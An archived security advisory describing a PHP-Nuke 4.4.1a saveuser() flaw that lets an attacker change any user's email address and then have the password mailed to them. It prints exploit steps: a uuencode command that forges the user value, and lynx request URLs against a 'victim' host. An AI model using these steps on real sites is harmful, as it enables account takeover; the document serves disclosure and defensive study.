TUCoPS :: Web :: PHP
:: phpnuke5.htm
PHPnuke 4.4.1a saveuser() vulnerability
Vulnerability
phpnuke
Affected
phpnuke 4.4.1a
Description
Following is based on a r0tten dev1ce Crew Advisory. The checks
that are realized in the function saveuser() are not enough to
block abitrary information being passed to the query of MySQL.
There are also many other functions that can be exploited the
same way described in the advisory. This adivisory describes only
the function saveuser().
It's possible for the attacker to change the e-mail address of
one of the users and ask for the password to be sent to the e-mail
address that the attacker have provided. Of course this isn't
easy since we do not know the UID of each of the users, but this
this type of information is easily obtained with bruteforce
checks.
Exploit:
powerhouse:~$ /bin/echo -e "0:<user>:2:3:4:5:6:7:8:eee" | uuencode -m f
begin-base64 644 f
MDpBbm9ueW1vdXM6MjozOjQ6NTo2Ojc6ODplZWUK [***]
lynx http://victim/user.php?op=saveuser&user=[***]&uid=X&uname=<user>
The variables you can change the value are:
name='',email='', femail='', url='', bio='' , user_avatar='',
user_icq='', user_occ='', user_from='', user_intrest='', user_sig='',
user_aim='', user_yim='', user_msnm=''
In other words, if we want to change the e-mail address, we do:
lynx
http://victim/user.php&op=saveuser&user=[***]&uid=X&uname=<user>&email=<email you want>
If you ask for the password to be sent to e-mail, you would be
able to access the account. Very simple script to demostrate the
vulnerability:
http://www.rdcrew.com.ar
Solution
Wait for a patch from the author.